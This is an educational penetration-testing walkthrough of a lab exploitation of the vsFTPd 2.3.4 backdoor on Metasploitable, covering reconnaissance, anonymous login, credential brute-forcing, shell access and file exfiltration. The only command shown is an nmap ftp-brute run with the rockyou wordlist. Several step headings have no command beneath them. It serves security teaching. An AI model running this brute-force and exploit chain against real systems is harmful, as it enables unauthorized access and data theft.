FTP Enumeration to Exploitation (vsFTPd 2.3.4)
Overview¶
This document presents a complete penetration testing walkthrough against a vulnerable system (Metasploitable). The objective is to demonstrate how an attacker can progress from basic reconnaissance to full system compromise and data exfiltration by combining multiple weaknesses.
Unlike isolated vulnerabilities, real-world attacks rely on chaining:
- Misconfigurations
- Weak authentication
- Outdated software
This walkthrough follows a structured methodology:
- Reconnaissance and service discovery
- Service-specific enumeration (FTP)
- Misconfiguration analysis
- Credential testing
- Vulnerability identification
- Exploitation
- Post-exploitation
- Data exfiltration
Target Information¶
- Target IP: 192.168.29.157
- Environment: Metasploitable (intentionally vulnerable Linux system)
- Primary Focus: FTP service (Port 21)
1. Reconnaissance and Service Discovery¶
The first phase aims to identify all externally exposed services and understand the system’s attack surface.
Explanation¶
-sS: SYN scan (stealth scan for identifying open ports)-T3: Balanced timing for reliability and speed-sV: Service version detection
Findings¶
- 21/tcp → FTP (vsFTPd 2.3.4)
- 22/tcp → SSH
- 80/tcp → HTTP
- 139/445 → SMB
- Additional services (databases, RPC, etc.)
Analysis¶
The system exposes multiple services, indicating poor hardening. A large attack surface increases the likelihood of exploitable weaknesses.
From a prioritization perspective:
- Services with known vulnerabilities are targeted first
- FTP stands out due to version disclosure
2. FTP Enumeration¶
2.1 Version Detection¶
Result¶
Analysis¶
Version detection is critical because:
- It allows mapping the service to known vulnerabilities
- Public exploit databases often index vulnerabilities by version
The version identified (vsFTPd 2.3.4) is known to contain a backdoor vulnerability that allows remote command execution.
2.2 Anonymous Login Check¶
Result¶
Explanation¶
- FTP servers sometimes allow anonymous access for public file sharing
- In secure environments, this is usually restricted or disabled
Security Impact¶
- Unauthorized users can access the service
- Potential exposure of sensitive files
- May allow file upload/download depending on configuration
3. Manual FTP Verification¶
Automated scans must always be validated manually.
Login using:
Observations¶
- Authentication successful
- Directory listing shows no files
- Navigation to other directories is restricted
Interpretation¶
This indicates:
- Anonymous access is enabled
- Permissions are limited (likely read-only or sandboxed)
Important Concept¶
Access does not always equal exploitability. Even when login is possible, permissions determine the actual impact.
4. Credential Bruteforce¶
To test authentication strength, credential brute-forcing is performed.
nmap --script ftp-brute \
--script-args userdb=/usr/share/wordlists/metasploit/unix_users.txt,passdb=/usr/share/wordlists/rockyou.txt \
-p 21 192.168.29.157
Explanation¶
- Uses username and password wordlists
- Attempts login combinations against the FTP service
Results¶
- ftp:ftp
- user:user
- postgres:postgres
Analysis¶
These credentials indicate:
- Default or weak passwords
- Poor credential management
Security Risk¶
- Unauthorized access
- Potential privilege escalation
- Reuse of credentials across services
5. Vulnerability Identification¶
At this stage, multiple findings are correlated:
| Finding | Type | Impact |
|---|---|---|
| Anonymous login | Misconfiguration | Unauthorized access |
| Weak credentials | Authentication flaw | Easy compromise |
| vsFTPd 2.3.4 | Software vulnerability | Remote code execution |
Key Insight¶
Each issue alone may not be critical. However, when combined, they significantly increase the attack impact.
This is a fundamental principle in penetration testing:
The severity of a system is determined by how vulnerabilities interact, not just individual flaws.
6. Exploitation¶
The identified vulnerability (vsFTPd 2.3.4 backdoor) is exploited using Metasploit.
Step 1: Start Metasploit¶
Step 2: Search for Exploit¶
Step 3: Select Module¶
Step 4: Configure Target¶
Step 5: Execute Exploit¶
Result¶
- Backdoor connection established
- Remote shell obtained
Explanation¶
The vulnerability introduces a hidden backdoor in the FTP service that opens a shell when triggered, allowing attackers to execute commands remotely.
7. Post-Exploitation¶
Once access is obtained, the system is explored to assess impact.
Key Directories¶
/etc→ Contains configuration files and potential credential data/home→ User directories and personal files/root→ Administrative data
Analysis¶
Access to these directories indicates:
- High-level privileges
- Full system compromise
Post-exploitation focuses on:
- Data discovery
- Privilege escalation (if needed)
- Persistence (not covered in this lab)
8. Data Exfiltration¶
The final stage is extracting sensitive data.
Identified file:
Download:
Explanation¶
Data exfiltration involves transferring files from the compromised system to the attacker’s system.
Real-World Targets¶
- Credentials and password files
- Databases
- Internal documents
- Configuration files
Importance¶
This step represents the primary objective of most attacks:
Access is only valuable if data can be extracted.
9. Key Concepts and Learnings¶
- Enumeration is the foundation of penetration testing
- Version detection enables targeted exploitation
- Misconfigurations often provide initial entry points
- Weak credentials significantly increase attack success
- Exploitation is a transition phase, not the final goal
- Data exfiltration defines the real impact of a compromise
10. Conclusion¶
This walkthrough demonstrates a realistic attack chain:
- Discover exposed services
- Identify weak configurations
- Correlate vulnerabilities
- Exploit known weaknesses
- Gain system access
- Extract sensitive data
It highlights how multiple small issues can be combined to achieve full system compromise.
Understanding this process is essential for:
- Penetration testers (offensive security)
- System administrators (defensive security)
Disclaimer¶
This content is intended for educational purposes only. All activities were performed in a controlled lab environment. Unauthorized testing on real systems is illegal.